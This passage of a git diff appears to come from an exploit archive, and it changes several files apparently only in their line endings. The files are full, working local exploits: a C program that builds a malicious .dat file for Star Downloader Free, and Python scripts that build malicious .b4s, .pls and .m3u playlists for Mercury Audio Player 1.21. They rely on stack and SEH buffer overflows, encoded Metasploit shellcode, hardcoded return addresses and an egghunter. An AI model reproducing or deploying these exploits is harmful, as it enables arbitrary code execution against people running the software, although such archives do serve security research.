-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38"
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44"
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33"
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37"
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53"
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57"
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59"
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56"
-"\x4e\x56\x43\x46\x42\x30\x5a";
-
-
-int main() {
-
-FILE *file;
-
-char buf[LEN+1];
-char *ptr=buf;
-
-
-memset(buf,NOP,LEN);
-buf[LEN]='\0';
-*(unsigned long *)&buf[1389] = JMP;
-*(unsigned long *)&buf[1393] = RET;
-ptr+=1390+4+4+40;
-memcpy(ptr, scode, strlen(scode));
-
-file=fopen("C:\\Program Files\\Star Downloader\\Partial Downloads\\pwn.dat","w");
-
-fputs(header1,file);
-fputs(buf,file);
-fputs(header2,file);
-
-fclose(file);
-
-printf("Done..\n");
- return 0;
-}
-
-// milw0rm.com [2009-04-15]
+/*
+ :::::::-. ... ::::::. :::.
+ ;;, `';, ;; ;;;`;;;;, `;;;
+ `[[ [[[[' [[[ [[[[[. 
'[[
+ $$, $$$$ $$$ $$$ "Y$c$$
+ 888_,o8P'88 .d888 888 Y88
+ MMMMP"` "YmmMMMM"" MMM YM
+ [ Discovered and Exploited by dun ]
+
+
+ [ Star Downloader Free <= v1.45 ] (.dat) Universal SEH Overwrite Exploit
+
+ Vendor: http://www.stardownloader.com
+ Download: http://www.stardownloader.com/sdfree.exe
+
+ Vuln:
+ LocalFileName=A x 1398
+
+ 1 run this expl( create file pwn.dat in "C:\Program Files\Star Downloader\Partial Downloads\" directory )
+ 2 now run Star Downloader Free
+ 3 .. ;0
+
+ [ dun'at'strcpy.pl / 2009 ]
+*/
+
+
+#include <windows.h>
+#include <stdio.h>
+
+/*
+
+/SafeSEH OFF 0x10000000 0x10025000 1, 0, 0, 1 C:\Program Files\Star Downloader\NSHelper.dll
+
+C:\crack>Findjmp2.exe "C:\Program Files\Star Downloader\NSHelper.dll" EBX
+...
+0x100112C2 pop EBX - pop - ret
+...
+*/
+
+#define RET 0x100112C2 // pop-pop-ret
+#define JMP 0x909011EB // short jump (jmp 11)
+#define NOP 0x90
+#define LEN 1390+4+4+40+343
+
+
+char header1[] =
+"\x5B\x4F\x70\x74\x69\x6F\x6E\x73\x5D\x0A\x0A\x55\x52\x4C\x3D\x68"
+"\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D"
+"\x0A\x4C\x6F\x63\x61\x6C\x46\x69\x6C\x65\x4E\x61\x6D\x65\x3D";
+
+char header2[] =
+"\x0A\x53\x74\x61\x74\x75\x73\x3D\x53\x63\x68\x65\x64\x75\x6C\x65"
+"\x64\x0A\x46\x69\x6C\x65\x53\x69\x7A\x65\x3D\x30\x0A\x4E\x75\x6D"
+"\x4F\x66\x50\x61\x72\x74\x73\x3D\x2D\x31\x0A\x43\x61\x74\x65\x67"
+"\x6F\x72\x79\x3D\x0A\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E"
+"\x3D\x0A";
+
+// win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+char scode[] =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48"
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38"
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44"
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33"
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37"
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53"
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57"
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59"
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56"
+"\x4e\x56\x43\x46\x42\x30\x5a";
+
+
+int main() {
+
+FILE *file;
+
+char buf[LEN+1];
+char *ptr=buf;
+
+
+memset(buf,NOP,LEN);
+buf[LEN]='\0';
+*(unsigned long *)&buf[1389] = JMP;
+*(unsigned long *)&buf[1393] = RET;
+ptr+=1390+4+4+40;
+memcpy(ptr, scode, strlen(scode));
+
+file=fopen("C:\\Program Files\\Star Downloader\\Partial Downloads\\pwn.dat","w");
+
+fputs(header1,file);
+fputs(buf,file);
+fputs(header2,file);
+
+fclose(file);
+
+printf("Done..\n");
+ return 0;
+}
+
+// milw0rm.com [2009-04-15]
diff --git a/platforms/windows/local/846.cpp b/platforms/windows/local/846.cpp
index 696095e80..6cdde8cb6 100755
--- a/platforms/windows/local/846.cpp
+++ b/platforms/windows/local/846.cpp
@@ -66,6 +66,6 @@ int main(void)
 } return 0;
-}
-
-// milw0rm.com [2005-02-27]
+}
+
+// milw0rm.com [2005-02-27]
diff --git a/platforms/windows/local/848.asm b/platforms/windows/local/848.asm
index ce11238d4..10a4889a4 100755
--- a/platforms/windows/local/848.asm
+++ b/platforms/windows/local/848.asm
@@ -68,6 +68,6 @@ start:
 .ENDIF
 invoke RegCloseKey , TheReturn
 Invoke ExitProcess,0
-end start
-
-; milw0rm.com [2005-02-28]
+end start
+
+; milw0rm.com [2005-02-28]
diff --git a/platforms/windows/local/8580.py b/platforms/windows/local/8580.py
index 57491020d..72c03e8b8 100755
--- a/platforms/windows/local/8580.py
+++ b/platforms/windows/local/8580.py
@@ -1,76 +1,76 @@
-#usage: exploit.py
-print "**************************************************************************"
-print " Mercury Audio Player 1.21 (.b4s) Local Stack Overflow\n"
-print " Refer: http://www.milw0rm.com/exploits/8578"
-print " Exploit code: His0k4"
-print " Tested on: Windows XP Pro SP3 (EN)\n"
-print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
-print "**************************************************************************"
-
-
-header1 = (
-"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
-"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x27\x55\x54"
-"\x46\x2d\x38\x27\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d"
-"\x22\x79\x65\x73\x22\x3f\x3e\x0d\x0a\x3c\x21\x2d\x2d\x20\x54\x68"
-"\x65\x20\x74\x61\x67\x20\x62\x65\x6c\x6f\x77\x20\x70\x72\x6f\x76"
-"\x69\x64\x65\x73\x20\x63\x6f\x6d\x70\x61\x74\x69\x62\x69\x6c\x69"
-"\x74\x79\x20\x77\x69\x74\x68\x20\x57\x69\x6e\x61\x6d\x70\x33\x20"
-"\x2d\x2d\x3e\x0d\x0a\x20\x3c\x57\x69\x6e\x61\x6d\x70\x58\x4d\x4c"
-"\x3e\x0d\x0a\x3c\x21\x2d\x2d\x20\x47\x65\x6e\x65\x72\x61\x74\x65"
-"\x64\x20\x62\x79\x20\x4d\x65\x72\x63\x75\x72\x79\x20\x41\x75\x64"
-"\x69\x6f\x20\x50\x6c\x61\x79\x65\x72\x20\x31\x2e\x32\x31\x20\x2d"
-"\x2d\x3e\x0d\x0a\x20\x20\x3c\x70\x6c\x61\x79\x6c\x69\x73\x74\x20"
-"\x6e\x75\x6d\x5f\x65\x6e\x74\x72\x69\x65\x73\x3d\x22\x31\x22\x20"
-"\x6c\x61\x62\x65\x6c\x3d\x22\x50\x6c\x61\x79\x6c\x69\x73\x74\x20"
-"\x30\x30\x31\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x65\x6e\x74\x72"
-"\x79\x20\x50\x6c\x61\x79\x73\x74\x72\x69\x6e\x67\x3d\x22\x66\x69"
-"\x6c\x65\x3a")
-
-header2 = (
-"\x2e\x6d\x70\x33\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x4e"
-"\x61\x6d\x65\x3e\x20\x2d\x20\x3c\x2f\x4e\x61\x6d\x65\x3e\x0d\x0a"
-"\x20\x20\x20\x20\x3c\x2f\x65\x6e\x74\x72\x79\x3e\x0d\x0a\x20\x20"
-"\x3c\x2f\x70\x6c\x61\x79\x6c\x69\x73\x74\x3e\x0d\x0a\x20\x3c\x2f"
-"\x57\x69\x6e\x61\x6d\x70\x58\x4d\x4c\x3e\x0d\x0a")
-
-buff = "\x41" * 800
-jump = "\x67\x86\x86\x7C" # jmp esp kernerl32.dll
-nops = 
"\x90"*6
-
-# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-shellcode = (
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
-"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47"
-"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58"
-"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38"
-"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
-"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x30\x45\x37\x45\x4e\x4b\x58"
-"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54"
-"\x4b\x38\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x58"
-"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43"
-"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x43\x45\x48\x42\x4c\x4a\x47"
-"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x48\x42\x47\x4e\x51\x4d\x4a"
-"\x4b\x38\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
-"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43"
-"\x48\x4f\x42\x46\x48\x55\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
-"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x59"
-"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x56\x41\x56"
-"\x4e\x56\x43\x36\x42\x30\x5a")
-
-exploit = header1 + buff + jump + nops + shellcode + header2
-
-try:
- out_file = open("exploit.b4s",'w')
- out_file.write(exploit)
- out_file.close()
- raw_input("\nExploit file created!\n")
-except:
- print "Error"
-
-# milw0rm.com [2009-04-30]
+#usage: exploit.py
+print "**************************************************************************"
+print " Mercury Audio Player 1.21 (.b4s) Local Stack Overflow\n"
+print " Refer: http://www.milw0rm.com/exploits/8578"
+print " Exploit code: His0k4"
+print " Tested on: Windows XP Pro SP3 (EN)\n"
+print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
+print "**************************************************************************"
+
+
+header1 = (
+"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
+"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x27\x55\x54"
+"\x46\x2d\x38\x27\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d"
+"\x22\x79\x65\x73\x22\x3f\x3e\x0d\x0a\x3c\x21\x2d\x2d\x20\x54\x68"
+"\x65\x20\x74\x61\x67\x20\x62\x65\x6c\x6f\x77\x20\x70\x72\x6f\x76"
+"\x69\x64\x65\x73\x20\x63\x6f\x6d\x70\x61\x74\x69\x62\x69\x6c\x69"
+"\x74\x79\x20\x77\x69\x74\x68\x20\x57\x69\x6e\x61\x6d\x70\x33\x20"
+"\x2d\x2d\x3e\x0d\x0a\x20\x3c\x57\x69\x6e\x61\x6d\x70\x58\x4d\x4c"
+"\x3e\x0d\x0a\x3c\x21\x2d\x2d\x20\x47\x65\x6e\x65\x72\x61\x74\x65"
+"\x64\x20\x62\x79\x20\x4d\x65\x72\x63\x75\x72\x79\x20\x41\x75\x64"
+"\x69\x6f\x20\x50\x6c\x61\x79\x65\x72\x20\x31\x2e\x32\x31\x20\x2d"
+"\x2d\x3e\x0d\x0a\x20\x20\x3c\x70\x6c\x61\x79\x6c\x69\x73\x74\x20"
+"\x6e\x75\x6d\x5f\x65\x6e\x74\x72\x69\x65\x73\x3d\x22\x31\x22\x20"
+"\x6c\x61\x62\x65\x6c\x3d\x22\x50\x6c\x61\x79\x6c\x69\x73\x74\x20"
+"\x30\x30\x31\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x65\x6e\x74\x72"
+"\x79\x20\x50\x6c\x61\x79\x73\x74\x72\x69\x6e\x67\x3d\x22\x66\x69"
+"\x6c\x65\x3a")
+
+header2 = (
+"\x2e\x6d\x70\x33\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x4e"
+"\x61\x6d\x65\x3e\x20\x2d\x20\x3c\x2f\x4e\x61\x6d\x65\x3e\x0d\x0a"
+"\x20\x20\x20\x20\x3c\x2f\x65\x6e\x74\x72\x79\x3e\x0d\x0a\x20\x20"
+"\x3c\x2f\x70\x6c\x61\x79\x6c\x69\x73\x74\x3e\x0d\x0a\x20\x3c\x2f"
+"\x57\x69\x6e\x61\x6d\x70\x58\x4d\x4c\x3e\x0d\x0a")
+
+buff = "\x41" * 800
+jump = "\x67\x86\x86\x7C" # jmp esp kernerl32.dll
+nops = "\x90"*6
+
+# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+shellcode = (
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
+"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47"
+"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58"
+"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38"
+"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
+"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x30\x45\x37\x45\x4e\x4b\x58"
+"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54"
+"\x4b\x38\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x58"
+"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43"
+"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x43\x45\x48\x42\x4c\x4a\x47"
+"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x48\x42\x47\x4e\x51\x4d\x4a"
+"\x4b\x38\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
+"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43"
+"\x48\x4f\x42\x46\x48\x55\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
+"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x59"
+"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x56\x41\x56"
+"\x4e\x56\x43\x36\x42\x30\x5a")
+
+exploit = header1 + buff + jump + nops + shellcode + header2
+
+try:
+ out_file = open("exploit.b4s",'w')
+ out_file.write(exploit)
+ out_file.close()
+ raw_input("\nExploit file created!\n")
+except:
+ print "Error"
+
+# milw0rm.com [2009-04-30]
diff --git a/platforms/windows/local/8582.py b/platforms/windows/local/8582.py
index 7cf51cfff..d3f251f81 100755
--- a/platforms/windows/local/8582.py
+++ b/platforms/windows/local/8582.py
@@ -1,49 +1,49 @@
-#usage: exploit.py
-print "**************************************************************************"
-print " Mercury Audio Player 1.21 (.pls) Seh Overwrite Exploit\n"
-print " Refer: http://www.milw0rm.com/exploits/8578"
-print " Exploit code: His0k4"
-print " Tested on: Windows XP Pro SP3 (EN)\n"
-print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
-print "**************************************************************************"
-
-
-header1 = (
-"\x5b\x50\x6c\x61\x79\x6c\x69\x73\x74\x5d\x0d\x0a\x46\x69\x6c\x65"
-"\x31\x3d")
-
-header2 = (
-"\x2e\x6d\x70\x33\x0d\x0a\x54\x69\x74\x6c\x65\x31\x3d\x20\x73\x69"
-"\x6c\x65\x6e\x63\x65\x20\x69\x73\x20\x67\x6f\x6c\x64\x0d\x0a\x4e"
-"\x75\x6d\x62\x65\x72\x4f\x66\x45\x6e\x74\x72\x69\x65\x73\x3d\x31"
-"\x0d\x0a\x56\x65\x72\x73\x69\x6f\x6e\x3d\x32\x0d\x0a")
-
-buff = "\x41" * 31
-next_seh = "\xEB\x06\x90\x90"
-seh = "\xB8\x15\xD1\x72" #msacm32.drv
-junk = "\x41"*3000
-
-# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-shellcode = (
-"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"
-"\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73"
-"\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f"
-"\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b"
-"\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50"
-"\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12"
-"\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd"
-"\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e"
-"\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32"
-"\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36")
-
-exploit = header1 + buff + next_seh + seh + shellcode + junk + header2
-
-try:
- out_file = open("exploit.pls",'w')
- out_file.write(exploit)
- out_file.close()
- raw_input("\nExploit file created!\n")
-except:
- print "Error"
-
-# milw0rm.com [2009-04-30]
+#usage: exploit.py
+print "**************************************************************************"
+print " Mercury Audio Player 1.21 (.pls) Seh Overwrite Exploit\n"
+print " Refer: http://www.milw0rm.com/exploits/8578"
+print " Exploit code: His0k4"
+print " Tested on: Windows XP Pro SP3 (EN)\n"
+print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
+print "**************************************************************************"
+
+
+header1 = (
+"\x5b\x50\x6c\x61\x79\x6c\x69\x73\x74\x5d\x0d\x0a\x46\x69\x6c\x65"
+"\x31\x3d")
+
+header2 = (
+"\x2e\x6d\x70\x33\x0d\x0a\x54\x69\x74\x6c\x65\x31\x3d\x20\x73\x69"
+"\x6c\x65\x6e\x63\x65\x20\x69\x73\x20\x67\x6f\x6c\x64\x0d\x0a\x4e"
+"\x75\x6d\x62\x65\x72\x4f\x66\x45\x6e\x74\x72\x69\x65\x73\x3d\x31"
+"\x0d\x0a\x56\x65\x72\x73\x69\x6f\x6e\x3d\x32\x0d\x0a")
+
+buff = "\x41" * 31
+next_seh = "\xEB\x06\x90\x90"
+seh = "\xB8\x15\xD1\x72" #msacm32.drv
+junk = "\x41"*3000
+
+# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+shellcode = (
+"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"
+"\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73"
+"\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f"
+"\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b"
+"\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50"
+"\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12"
+"\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd"
+"\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e"
+"\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32"
+"\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36")
+
+exploit = header1 + buff + next_seh + seh + shellcode + junk + header2
+
+try:
+ out_file = open("exploit.pls",'w')
+ out_file.write(exploit)
+ out_file.close()
+ raw_input("\nExploit file created!\n")
+except:
+ print "Error"
+
+# milw0rm.com [2009-04-30]
diff --git a/platforms/windows/local/8583.py b/platforms/windows/local/8583.py
index 021624108..826f183ba 100755
--- a/platforms/windows/local/8583.py
+++ b/platforms/windows/local/8583.py
@@ -1,53 +1,53 @@
-#usage: exploit.py
-#Note : Exploit take about 30 seconds to work.
-print "**************************************************************************"
-print " Mercury Audio Player 1.21 (.m3u) Seh Overwrite Exploit\n"
-print " Refer: http://www.milw0rm.com/exploits/8578"
-print " Exploit code: His0k4"
-print " Tested on: Windows XP Pro SP3 (EN)\n"
-print " greetz: TO ELITE ALGERIANS (TixxDZ),snakespc.com\n"
-print "**************************************************************************"
-
-
-buff = "\x41" * 16740
-next_seh = "\xEB\x06\x41\x42"
-seh = "\xB8\x15\xD1\x72" #msacm32.drv
-
-
-# win32_exec - EXITFUNC=seh CMD=calc Size=158 Encoder=PexFnstenvMov http://metasploit.com
-shellcode = (
-"DZ27DZ27"+"\x90\x90\x90\x90\x90\x90\x90\x90"
-"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x22\xd1\xdc"
-"\x59\x83\xeb\xfc\xe2\xf4\xde\x39\x98\x59\x22\xd1\x57\x1c\x1e\x5a"
-"\xa0\x5c\x5a\xd0\x33\xd2\x6d\xc9\x57\x06\x02\xd0\x37\x10\xa9\xe5"
-"\x57\x58\xcc\xe0\x1c\xc0\x8e\x55\x1c\x2d\x25\x10\x16\x54\x23\x13"
-"\x37\xad\x19\x85\xf8\x5d\x57\x34\x57\x06\x06\xd0\x37\x3f\xa9\xdd"
-"\x97\xd2\x7d\xcd\xdd\xb2\xa9\xcd\x57\x58\xc9\x58\x80\x7d\x26\x12"
-"\xed\x99\x46\x5a\x9c\x69\xa7\x11\xa4\x55\xa9\x91\xd0\xd2\x52\xcd"
-"\x71\xd2\x4a\xd9\x37\x50\xa9\x51\x6c\x59\x22\xd1\x57\x31\x1e\x8e"
-"\xed\xaf\x42\x87\x55\xa1\xa1\x11\xa7\x09\x4a\x21\x56\x5d\x7d\xb9"
-"\x44\xa7\xa8\xdf\x8b\xa6\xc5\xb2\xbd\x35\x41\xd1\xdc\x59")
-
-#[*] x86/alpha_mixed succeeded with size 126 (iteration=1)
-egghunter=(
-"\x89\xe5\xda\xd9\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
-"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
-"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
-"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
-"\x45\x36\x4d\x51\x48\x4a\x4b\x4f\x44\x4f\x51\x52\x46\x32\x42"
-"\x4a\x45\x52\x46\x38\x48\x4d\x46\x4e\x47\x4c\x45\x55\x51\x4a"
-"\x44\x34\x4a\x4f\x48\x38\x47\x34\x50\x5a\x50\x32\x50\x37\x4c"
-"\x4b\x4b\x4a\x4e\x4f\x43\x45\x4b\x5a\x4e\x4f\x42\x55\x4b\x57"
-"\x4b\x4f\x4d\x37\x41\x41")
-
-exploit = buff + shellcode + next_seh + seh + egghunter + "\x90"*7
-
-try:
- out_file = open("exploit.m3u",'w')
- out_file.write(exploit+".mp3")
- out_file.close()
- raw_input("\nExploit file created!\n")
-except:
- print "Error"
-
-# milw0rm.com [2009-05-01]
+#usage: exploit.py
+#Note : Exploit take about 30 seconds to work.
+print "**************************************************************************"
+print " Mercury Audio Player 1.21 (.m3u) Seh Overwrite Exploit\n"
+print " Refer: http://www.milw0rm.com/exploits/8578"
+print " Exploit code: His0k4"
+print " Tested on: Windows XP Pro SP3 (EN)\n"
+print " greetz: TO ELITE ALGERIANS (TixxDZ),snakespc.com\n"
+print "**************************************************************************"
+
+
+buff = "\x41" * 16740
+next_seh = "\xEB\x06\x41\x42"
+seh = "\xB8\x15\xD1\x72" #msacm32.drv
+
+
+# win32_exec - EXITFUNC=seh CMD=calc Size=158 Encoder=PexFnstenvMov http://metasploit.com
+shellcode = (
+"DZ27DZ27"+"\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x22\xd1\xdc"
